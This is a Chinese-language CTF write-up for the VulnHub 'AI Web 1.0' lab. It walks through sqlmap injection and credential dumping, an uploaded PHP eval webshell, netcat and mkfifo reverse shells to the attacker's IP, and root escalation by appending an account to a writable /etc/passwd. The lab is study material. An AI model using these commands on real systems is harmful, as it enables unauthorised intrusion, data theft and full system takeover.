VulnHub靶场之AI Web 1.0超易懂反弹shell提权cat flag

admin 2025年3月15日23:58:59评论9 views字数 3508阅读11分41秒阅读模式

靶场的搭建

设备:vm虚拟机,靶场的镜像,kali

靶场的镜像我已经放在下面的百度网盘链接了,解压之后直接用vm打开就可以了:

链接:https://pan.baidu.com/s/14cWClfqhuueQK5ayHjDB7Q 提取码:hhy8

VulnHub靶场之AI Web 1.0超易懂反弹shell提权cat flag

信息收集

主机扫描

netdiscover

kali的netdircover扫描一下存活的主机

VulnHub靶场之AI Web 1.0超易懂反弹shell提权cat flag

除了物理机,kali外,剩下的就是靶场的ip;192.168.2.128,这里要注意的是,扫描的网段是nat模式的网段,可以在虚拟机的网络编辑器上看。

VulnHub靶场之AI Web 1.0超易懂反弹shell提权cat flag

netdiscover -r 192.168.2.0/24

VulnHub靶场之AI Web 1.0超易懂反弹shell提权cat flag

扫描到主机的ip为:192.168.2.128

nmap

nmap -sP 192.168.2.0/24

VulnHub靶场之AI Web 1.0超易懂反弹shell提权cat flag

LanSee局域网工具扫描

设置好扫描网段,开始扫描

VulnHub靶场之AI Web 1.0超易懂反弹shell提权cat flag

VulnHub靶场之AI Web 1.0超易懂反弹shell提权cat flag

端口扫描

nmap -sS -sV -A -n  192.168.2.128

VulnHub靶场之AI Web 1.0超易懂反弹shell提权cat flag

发现apache的80端口是开的,http服务是开启的,访问一下网址看看,发现没有什么东西

VulnHub靶场之AI Web 1.0超易懂反弹shell提权cat flag

目录扫描

御剑扫描一下看看有什么有用的文件路径

VulnHub靶场之AI Web 1.0超易懂反弹shell提权cat flag

发现robots.txt文件(Robots协议也称为爬虫协议)

我们访问一下这个路径

VulnHub靶场之AI Web 1.0超易懂反弹shell提权cat flag

发现有很多路径 ,都访问看看有没有什么信息提示

VulnHub靶场之AI Web 1.0超易懂反弹shell提权cat flag

VulnHub靶场之AI Web 1.0超易懂反弹shell提权cat flag

se3reTdir777目录

后退上级目录发现有一个提交框

VulnHub靶场之AI Web 1.0超易懂反弹shell提权cat flag

判断是否有SQL注入,提交不同的id,发现回显,说明存在SQL注入

VulnHub靶场之AI Web 1.0超易懂反弹shell提权cat flagVulnHub靶场之AI Web 1.0超易懂反弹shell提权cat flag

用sqlmap自动注入

bp抓包

保存为1.txt

VulnHub靶场之AI Web 1.0超易懂反弹shell提权cat flag

爆出数据库

python sqlmap.py -r "D:1.txt" --dbs

VulnHub靶场之AI Web 1.0超易懂反弹shell提权cat flag

爆出数据表

python sqlmap.py -r "D:1.txt" -D aiweb1 --tables

VulnHub靶场之AI Web 1.0超易懂反弹shell提权cat flag

爆出数据表的列名

python sqlmap.py -r "D:1.txt" -D aiweb1 -t users --columns

VulnHub靶场之AI Web 1.0超易懂反弹shell提权cat flag

爆出users表的数据

python sqlmap.py -r "D:1.txt" -D aiweb1 -t users --dump

VulnHub靶场之AI Web 1.0超易懂反弹shell提权cat flag

爆出systemUser表的数据

python sqlmap.py -r "D:1.txt" -D aiweb1 -T systemUser --dump

VulnHub靶场之AI Web 1.0超易懂反弹shell提权cat flag

密码是经过加密的,base64解密后看看

FakeUserPassw0rdMyEvilPass_f908sdaf9_sadfasf0saN0tThis0neAls0

但是目前没有发现登录的后台,无法登录,先保存下来

m3diNf0目录

用dirb扫描一下

dirb http://192.168.2.128/m3diNf0/

VulnHub靶场之AI Web 1.0超易懂反弹shell提权cat flag

发现有一个info.php的文件

漏洞利用

info.php的文件这个文件保存很多系统服务器的信息,访问一下看看

发现文件绝对路径:/home/www/html/web1x443290o2sdf92213 用户:www-data

eval函数没禁用,可以编写一句话木马上传

VulnHub靶场之AI Web 1.0超易懂反弹shell提权cat flag

VulnHub靶场之AI Web 1.0超易懂反弹shell提权cat flag

    那现在就可以在uploads/路径下上传文件,通过sqlmap进行写入一个木马文件

获取shell

尝试使用sqlmap的–os-shell命令getshel

原理:通过into outfile/into dumpfile写文件的方式进行文件写入

os-shell执行条件有三个:1.网站必须是root权限2.网站的绝对路径已知3.GPC为off(php主动转义的功能关闭)

python sqlmap.py -u "http://192.168.2。128/se3reTdir777/" --data "uid=1&Operation=Submit" --os-shell

VulnHub靶场之AI Web 1.0超易懂反弹shell提权cat flag

sqlmap上传一句话木马

编写一句话木马1.php

<?php@eval($_POST['123']);?>

上传一句话木马--file-write:去读取文件(当前目录下的1.php)--file-dest:后面加我们向目标写的文件,目标url:

/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/,把这个文件上传到123.php这个地址,现在我们就在uploads这个命令下写好了1.php文件

sqlmap -u "http://192.168.2.128/se3reTdir777/" --data "uid=1&Operation=Submit" --file-write ./1.php --file-dest /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/1.php

上传成功

VulnHub靶场之AI Web 1.0超易懂反弹shell提权cat flag

虽然php一句话木马看不见,但是我们可以看到是存在这个 页面的

VulnHub靶场之AI Web 1.0超易懂反弹shell提权cat flag

蚁剑连接

VulnHub靶场之AI Web 1.0超易懂反弹shell提权cat flag

连接成功

VulnHub靶场之AI Web 1.0超易懂反弹shell提权cat flag

查看用户权限

VulnHub靶场之AI Web 1.0超易懂反弹shell提权cat flag

发现我们只有www-data的权限,权限不足

nc反弹shell

反弹shell的作用看这一篇:

https://blog.csdn.net/weixin_44288604/article/details/111740527?fromshare=blogdetail&sharetype=blogdetail&sharerId=111740527&sharerefer=PC&sharesource=2301_77091612&sharefrom=from_link

攻击端;kali(192.168.2.129)开启端口监听,监听7777端口

nc -lvvp 7777

VulnHub靶场之AI Web 1.0超易懂反弹shell提权cat flag

靶机端蚁剑终端上nc反弹:(-e参数不可用)

nc -e /bin/bash 192.168.2.128 7777

VulnHub靶场之AI Web 1.0超易懂反弹shell提权cat flag

rm /tmp/f              #rm  删除文件 因为要保证没有/tmp/f 这个文件mkfifo /tmp/f          #mkfifo :创建一个FIFO特殊文件,是一个命名管道(可以用来做进程之间通信的桥梁)cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.2.129 7777 >/tmp/f

VulnHub靶场之AI Web 1.0超易懂反弹shell提权cat flag

VulnHub靶场之AI Web 1.0超易懂反弹shell提权cat flag

反弹shell成功

VulnHub靶场之AI Web 1.0超易懂反弹shell提权cat flag

提权

当我们反弹shell后要提高权限才能成为root账户

VulnHub靶场之AI Web 1.0超易懂反弹shell提权cat flag

查看有哪些文件有读写的权限

find / -writable -type f 2>/dev/null

VulnHub靶场之AI Web 1.0超易懂反弹shell提权cat flag

发现最敏感的文件有读写的权限,因为之前已经拿到了webshell了,我们可以直接将信息写入到此文件中

我们先进入交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

VulnHub靶场之AI Web 1.0超易懂反弹shell提权cat flag

用find保存查询的结果放在目录/tmp下

find / -writable -type f 2>/dev/null > /tmp/writableFiles

VulnHub靶场之AI Web 1.0超易懂反弹shell提权cat flag

VulnHub靶场之AI Web 1.0超易懂反弹shell提权cat flag

我们可以看到文件已经保存到靶机啦,下载下来看看有没有什么可疑的文件

VulnHub靶场之AI Web 1.0超易懂反弹shell提权cat flag

c0nFil3bd.php这个文件可疑,不太像自带的文件,看一下是什么文件

VulnHub靶场之AI Web 1.0超易懂反弹shell提权cat flag

我们惊奇的发现我们得到了数据库密码和用户名,但是我们要在/etc/passwd文件添加账户,前面我们知道该文件具有写权限(可以直接写入进去,也可以利用命令行)

格式:root:x:0:0:root:/root:/bin/bashx为密码

VulnHub靶场之AI Web 1.0超易懂反弹shell提权cat flag

我们发现这些账号是没有密码的,但是sudo密码验证失败,必须生成一个有密码的账户,我们可以利用python的加密库生成Linux 系统用户密钥

VulnHub靶场之AI Web 1.0超易懂反弹shell提权cat flag

写进etc/passwd中

echo 'huang:hucY8XJObbxR6:0:0:root:/root:/bin/bash'>>/etc/passwd

VulnHub靶场之AI Web 1.0超易懂反弹shell提权cat flag

VulnHub靶场之AI Web 1.0超易懂反弹shell提权cat flag

切换到huang用户,输入密码123456

VulnHub靶场之AI Web 1.0超易懂反弹shell提权cat flag

提权成功,接下来就是进入root目录找flag在哪了

VulnHub靶场之AI Web 1.0超易懂反弹shell提权cat flag

成功得到flag

0基础网安小白,如有雷同纯属q和我一起自律轻松学习,可关注微信公众号【Cauchy安全 】

参考文章:

https://blog.csdn.net/Continuejww/article/details/135278393?fromshare=blogdetail&sharetype=blogdetail&sharerId=135278393&sharerefer=PC&sharesource=2301_77091612&sharefrom=from_link

https://blog.csdn.net/weixin_45908624/article/details/128476078?fromshare=blogdetail&sharetype=blogdetail&sharerId=128476078&sharerefer=PC&sharesource=2301_77091612&sharefrom=from_link

原文始发于微信公众号(Cauchy安全):VulnHub靶场之AI Web 1.0超易懂反弹shell提权cat flag

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年3月15日23:58:59
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   VulnHub靶场之AI Web 1.0超易懂反弹shell提权cat flaghttps://cn-sec.com/archives/3843841.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息